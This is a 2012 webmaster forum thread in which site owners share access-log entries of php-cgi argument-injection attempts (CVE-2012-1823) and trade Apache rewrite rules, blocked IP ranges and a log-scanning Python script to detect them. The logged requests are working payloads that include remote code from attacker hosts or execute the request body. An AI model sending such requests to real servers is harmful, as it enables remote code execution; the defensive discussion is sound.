Search Engine Spider and User Agent Identification Forum

what is this POST command and why did it get a 200?
dupres01
msg:4456439  2:37 pm on May 22, 2012 (gmt 0)

The following showed up in my log. I have no idea what it is doing. Also, this is the only entry in the log for IP 173.73.115.178.

173.73.115.178 - - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"

The IP hasn't accessed anything on my site so I don't even know what it is posting in response to.
It looks to me as if it is trying to do something destructive, but I am only guessing.

(I am unsure which forum topic this question belongs in.)

dstiles
msg:4456606  8:58 pm on May 22, 2012 (gmt 0)

That specific IP had a go at my server a couple of days ago. It got rejected but tried 3 times in all.

All three hits were with the UA...
Mozilla/3.0 (windows)
...same as a hit 15 minutes earlier from an AT&T IP (also blocked) and probably others.

I don't log POSTs in my security logs (they can be far too long!). The QUERYSTRING is the same though, but only on the second and third hits, not the first, which was probably just establishing contact.

I would guess it was trying to add something nasty into a php file on the site. Whether it could succeed depends on how you handle such things - or even whether your site is php in the first place. :)

dupres01
msg:4456676  11:08 pm on May 22, 2012 (gmt 0)

Dstiles: thanks for the reply. I blocked that IP as soon as I saw the log reference.
Is there any way I can determine which php file was involved (short of examining every one of them)?

lucy24
msg:4456687  11:22 pm on May 22, 2012 (gmt 0)

From the topic header:
why did it get a 200

Was it supposed to get a 403? I've had similar headscratchers, and they tend to come down to UA rewrites. For example, if a nasty robot pretends to be MSIE 5, it will get rewritten to a special page. So it may never meet the later rules that would have kicked in if a normal UA had made the same request.

There are other possible explanations, but they all come down to: Even though logs say 200, your visiting nasty didn't actually get what it wanted.

g1smd
msg:4456691  11:29 pm on May 22, 2012 (gmt 0)

The /?- start suggests that the root index file was involved.

keyplyr
msg:4456701  11:55 pm on May 22, 2012 (gmt 0)

dupres01 - I would FTP to your account and have a look at files on your server, in particular the PHP folder to see if there have been any new files added. Also you might take a look at the HTML of your online index page and a couple of the other landing pages for any added code, usually at the top or the very bottom.

wilderness
msg:4456707  12:05 am on May 23, 2012 (gmt 0)

Had the same request two days ago:

173.73.115.178 - - [20/May/2012:22:53:37 +0100] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 403 533 "-" "Mozilla/3.0 (windows)"

was denied based upon incorrect case or syntax on "Windows"

g1smd
msg:4456714  12:13 am on May 23, 2012 (gmt 0)

I see that I bounced it purely on the use of underscores in the URL request.

I never use underscores in URLs. This ruling also has the handy effect of blocking direct access to PHP include files as their file names often do have underscores.

If that rule hadn't been there, then the combination of POST and "php" in the URL would have kicked it to the kerb anyway.

wilderness
msg:4456734  1:15 am on May 23, 2012 (gmt 0)

I never use underscores in URLs.


Don't recall that I ever have either, although I used one on Saturday for a temp-file-trivia.

What syntax do you use for the denial?

keyplyr
msg:4456740  1:21 am on May 23, 2012 (gmt 0)

I block "prepend" and "append" anywhere from incoming requests, although I do it myself on the server.

g1smd
msg:4456744  1:36 am on May 23, 2012 (gmt 0)

Block requests with underscore in path:
RewriteRule _ - [F]

I redirect requests with parameters over to extensionless URLs. The RegEx patterns that capture the parameter values usually allow only lower case letters, numbers and hyphens. Everything else will lead to a 404 error at the very least.

SteveWh
msg:4456861  8:42 am on May 23, 2012 (gmt 0)

That looks like an attempt to exploit the vulnerability in some PHP-as-CGI setups, which was discussed here and elsewhere a couple of weeks ago.

[php.net...]

It tries to use the PHP -d flag to set two php.ini entries.

The request got a 200 response because it was basically just a request for your home page, with the maliciously-intentioned query string added.

grandma genie
msg:4457174  2:09 am on May 24, 2012 (gmt 0)

I have also gotten a similar type of log entry.

177.8.168.n - - "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 302 - "-" "-"

And just now I found an entry that seems in some odd way connected. This visitor has sucuri.net as its initial referer (although that could be bogus). But the IP is coming from linode. And the UAs are bogus. Here are some samples:

97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example HTTP/1.1" 301 249 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example/ HTTP/1.1" 200 22302 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://sucuri.net" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 198 "-" "Ipad Iphone Safari"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 - "h**p://www.bing.com/?s=bin" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"

Just seemed odd that this visitor would go from a site about website security and malware to my ecommerce site that had recently seen an attempted exploit and then attempted its own exploit. Like it was doing some testing. Not sure if there is any connection at all, but just thought I would throw it out for your info.

By the way, the 302 redirects are happening, I believe, because my index.php file is a redirect.

wilderness
msg:4457201  3:44 am on May 24, 2012 (gmt 0)

gg,

Two things with so-called visitor from 97.107.135.nnn:
1) why on earth are you allowing visitors with "fake google UA's" (especially this malformed one)?

2) Linode is a server farm:
97.107.128.0 - 97.107.143.255

blend27
msg:4457330  12:01 pm on May 24, 2012 (gmt 0)

OT: More ranges on LINODE server farm.

LINODE-US (NET6-2600-3C00-1) 2600:3C00:: - 2600:3C03:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
LINODE-US (NET-173-230-128-0-1) 173.230.128.0 - 173.230.159.255
LINODE-US (NET-173-255-192-0-1) 173.255.192.0 - 173.255.255.255
LINODE-US (NET-50-116-0-0-1) 50.116.0.0 - 50.116.63.255
LINODE-US (NET-66-228-32-0-1) 66.228.32.0 - 66.228.63.255
LINODE-US (NET-69-164-192-0-1) 69.164.192.0 - 69.164.223.255
LINODE-US (NET-72-14-176-0-1) 72.14.176.0 - 72.14.191.255
LINODE-US (NET-74-207-224-0-1) 74.207.224.0 - 74.207.255.255
LINODE-US (NET-96-126-96-0-1) 96.126.96.0 - 96.126.127.255
LINODE-US (NET-97-107-128-0-1) 97.107.128.0 - 97.107.143.255

dstiles
msg:4457570  9:17 pm on May 24, 2012 (gmt 0)

I have a couple of extras on that list...

50.116.0.0 - 50.116.63.255
66.228.32.0 - 66.228.63.255
69.164.192.0 - 69.164.223.255
72.14.176.0 - 72.14.191.255
74.207.224.0 - 74.207.255.255
96.126.96.0 - 96.126.127.255
97.107.128.0 - 97.107.143.255
109.74.192.0 - 109.74.207.255 (UK)
173.230.128.0 - 173.230.159.255
173.255.192.0 - 173.255.255.255
178.79.128.0 - 178.79.191.255

blend27
msg:4457763  11:34 am on May 25, 2012 (gmt 0)

2012-05-24 19:17:11 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt 80 - 108.49.215.253 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

108.49.215.253(Verizon Online LLC) trying to inject info3.txt from 81.17.24.82(privatelayer.com.pa - server farm)

dstiles
msg:4457934  8:18 pm on May 25, 2012 (gmt 0)

81.17.24.82 - not just any server farm. Although only blocked by me in January this year my notes say "listed in uce-protect Level 2 as banned (ie for spam) - robtex claims RU, DNS claims CH and registration address is PA (Panama)". There is no rDNS for the specific IP, unusual for a server farm.

I have the complete 81.17.16.0/20 blocked for the above reasons. It looks very dodgy to me.

Verizon is such a large range (108.0.0.0-108.57.255.255) that anything could happen there - and frequently does. Haven't had so many this year but last year over 50 IPs blocked within that range, some for multiple offences. In all I have blocked around 450 verizon IPs over the past couple of years. Not as bad as Comcast (990) but still nasty.

grandma genie
msg:4470781  6:19 am on Jun 29, 2012 (gmt 0)

Just as a little follow-up, here is a sampling of log entries of a similar nature. This is just for your information.

74.55.62.nn - - [03/Jun/2012:13:48:36 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

91.224.160.nnn - - [03/Jun/2012:23:37:41 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51"

85.92.83.nnn - - [05/Jun/2012:10:45:05 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

190.60.44.nnn - - [19/Jun/2012:19:54:26 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"

213.190.161.nnn - - [23/Jun/2012:12:00:39 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.805"

200.62.177.nn - - [25/Jun/2012:12:55:27 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/id.txt%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

70.84.108.nn - - [25/Jun/2012:17:00:29 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/6.04"

MxAngel
msg:4471119  11:49 pm on Jun 29, 2012 (gmt 0)

It has been going on for a while. They are after the latest PHP-CGI remote code execution bug (CVE-2012-1823).

[stopmalvertising.com...]

When PHP is used in a CGI wrapper, remote attackers may use command-line switches, such as -s, -d or -c, in a query string that will be passed to the PHP-CGI binary, leading to arbitrary code execution or source code disclosure.


[eindbazen.net...]

If you are vulnerable the following directive might help:

RewriteEngine On
# A query string with no literal "=" is handed to php-cgi as argv; refuse any that starts with a switch
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]

Most of them will try a RFI (Remote File Inclusion) which is a shell most of the time.

g1smd
msg:4471121  11:54 pm on Jun 29, 2012 (gmt 0)

Couple of quick fixes:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+
RewriteRule .* - [F]
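To see what the two RewriteCond fixes above (MxAngel's and g1smd's) actually key on, and what SteveWh meant by "the PHP -d flag", here is an added example in Python. It is not code posted by anyone in this thread. It models the CGI rule the attack depends on: when a query string contains no literal "=", the server treats it as an "indexed" query (RFC 3875 section 4.4), splits it on "+", percent-decodes each word and passes the words to php-cgi as argv. A "%3d" only turns into "=" after that check, which is why the attackers encode it. The script then pulls out the switches and php.ini directives each request tried to set, and re-applies the posted RewriteCond to the raw query string (as Apache's %{QUERY_STRING} holds it, undecoded) to show which lines that rule would have refused. The log lines inside are constructed from samples posted in this thread (masked octets kept, a timestamp added to the 177.8.168.n line) plus two made-up benign requests; the combined log format is assumed.

```python
"""Spot CVE-2012-1823 php-cgi argument injection in access-log lines.

Added example for this thread, not code posted by any member. It models
the CGI behaviour the attack relies on: a query string with no literal '='
is "indexed" (RFC 3875 section 4.4), so the server splits it on '+',
percent-decodes each word and hands the words to php-cgi as argv.
"""
import re
from urllib.parse import unquote

# Apache combined log line (same field layout as the samples posted in this thread).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# php-cgi switches abused here: -d sets an ini directive, -s shows source,
# -c names a php.ini, -n ignores php.ini.
DANGEROUS_SWITCHES = {"-d", "-s", "-c", "-n"}

# The RewriteCond pattern posted in this thread, applied to the raw query string
# exactly as Apache's %{QUERY_STRING} holds it (undecoded, so %3d is not '=').
POSTED_RULE = re.compile(r"(%2d|-)[^=]+", re.IGNORECASE)


def cgi_argv(query):
    """argv a CGI server derives from QUERY_STRING, or [] for an ordinary key=value query."""
    if query == "" or "=" in query:
        return []
    return [unquote(word) for word in query.split("+")]


def rule_blocks(query):
    """True if the posted RewriteCond ^(%2d|-)[^=]+$ [NC] would 403 this raw query."""
    return POSTED_RULE.fullmatch(query) is not None


def php_cgi_injection(query):
    """Return a finding dict if the query passes switches to php-cgi, else None."""
    argv = cgi_argv(query)
    switches, directives = set(), {}
    i = 0
    # php's getopt stops at the first word that does not start with '-'.
    while i < len(argv) and argv[i].startswith("-"):
        arg = argv[i]
        flag = arg[:2]
        i += 1
        if flag == "-d":
            # optarg is either glued on ('-dkey=value') or the next word ('-d key=value')
            if len(arg) > 2:
                assignment = arg[2:]
            elif i < len(argv):
                assignment = argv[i]
                i += 1
            else:
                assignment = ""
            key, _, value = assignment.strip().partition("=")
            if key:
                directives[key] = value
        if flag in DANGEROUS_SWITCHES:
            switches.add(flag)
    if not switches:
        return None
    prepend = directives.get("auto_prepend_file", "")
    if prepend == "php://input":
        payload = "request body executed as PHP"
    elif prepend.startswith(("http://", "https://", "ftp://")):
        payload = "remote file inclusion from " + prepend
    elif prepend:
        payload = "local file " + prepend
    else:
        payload = "no auto_prepend_file"
    return {"switches": sorted(switches), "directives": directives, "payload": payload}


def scan_log(lines):
    """Parse combined-log lines and return one finding per injection attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        finding = php_cgi_injection(query)
        if finding:
            finding.update(ip=m.group("ip"), method=m.group("method"),
                           status=m.group("status"), blocked_by_rule=rule_blocks(query))
            findings.append(finding)
    return findings


# Constructed sample log: the first three requests are ones posted in this thread
# (masked octets kept; a timestamp was added to the 177.8.168.n line), the last
# two are made-up benign requests.
SAMPLE_LOG = [
    '173.73.115.178 - - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"',
    '190.60.44.nnn - - [19/Jun/2012:19:54:26 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"',
    '177.8.168.n - - [24/May/2012:01:30:00 -0400] "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 302 - "-" "-"',
    '203.0.113.5 - - [24/May/2012:01:31:00 -0400] "GET /index.php?page=2&sort=name HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [24/May/2012:01:32:00 -0400] "GET /cgi-bin/search?linux+kernel HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["method"], f["status"], f["switches"], f["payload"],
              "blocked by rule" if f["blocked_by_rule"] else "NOT blocked by rule")
```

Run as a script it reports the three hostile lines and leaves the two benign ones alone; "linux+kernel" does become argv but carries no switch, which is the case the posted rule also lets through. Note that the 200 on the first line only says Apache served the home page: the access log cannot tell you whether php-cgi ever saw the switches, so the on-disk check keyplyr suggested is still the right follow-up.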

blend27
msg:4471272  1:44 pm on Jun 30, 2012 (gmt 0)

2012-06-30 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt 80 - 83.155.50.106 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

Note that the IP it's pointing to is UP by one from my prev post on this. This is from a different site than the prev one.

WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved